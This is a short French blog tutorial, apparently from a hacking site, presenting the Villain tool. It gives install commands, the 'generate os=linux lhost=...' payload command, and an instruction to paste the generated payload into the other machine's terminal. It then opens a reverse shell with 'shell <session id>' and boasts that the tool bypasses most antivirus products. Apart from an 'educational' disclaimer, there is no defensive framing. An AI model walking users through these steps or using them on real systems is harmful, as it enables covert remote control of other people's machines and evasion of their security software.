IMPORTANT: Ce contenu est à titre éducatif

Les systèmes linux sont infaillible?

La réponse à cette est question est : “NON”. Certaines versions du noyau Linux sont bourré de vulnérabilité, sauf que leurs exploitations sont des fois compliqués et moins rentable. Très fan des projets open source je vous présent dans ce mini tutoriel Villan, je vous d’ailleurs, je vous invite à faire un tour sur le répertoire officiel de Github du projet à cette adresse https://github.com/t3l3machus/Villain. Vous avez la possibilité de générer des playload pour les systèmes Linux et Windows. 

Villain sous un système Linux

git clone https://github.com/t3l3machus/Villain
cd /Villain
pip3 install -r requirements.txt
python3 Villain.py
villain.py

Vous disposez de la commande help pour savoir plus sur la liste de commandes disponible. Nous aurons besoin de la commande generate pour générer notre playload, la commande sessions pour lister les sessions en cours et la commande shell pour initié une session Shell Reverse.

villain
villain

Les choses sérieuses commencent voici un exemple de commande pour générer votre playload

generate os=linux lhost=wlp5s0 
villain
Generation d’un playload Villain

Le bout de code généré sera automatiquement copié dans le papier presse, vous devez le collez dans le terminal de l’autre côté.

Villain
Villain

La commande la session vous permet, vous savoir si une session a est active ou pas. Nous allons initier un session shell reverse à partir de cette commande shell suivie du ID de la session.

shell 1d642acb-c5b65e76-a574c19b

Lire aussi : Contrôler un Android à distance

Aller plus loin

Villan est vraiment au complet et arrive à contourner facilement la plupart les bases antivirales du marché. Je vous invite à explorer les autres commandes associées pour vous imprimerez de l’outil. Vous pouvez aussi essayer le playload Windows si cela vous tente. N’oubliez pas de laisser un commentaire et de nous suivre sur nos différents canaux numériques.

Publications similaires

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *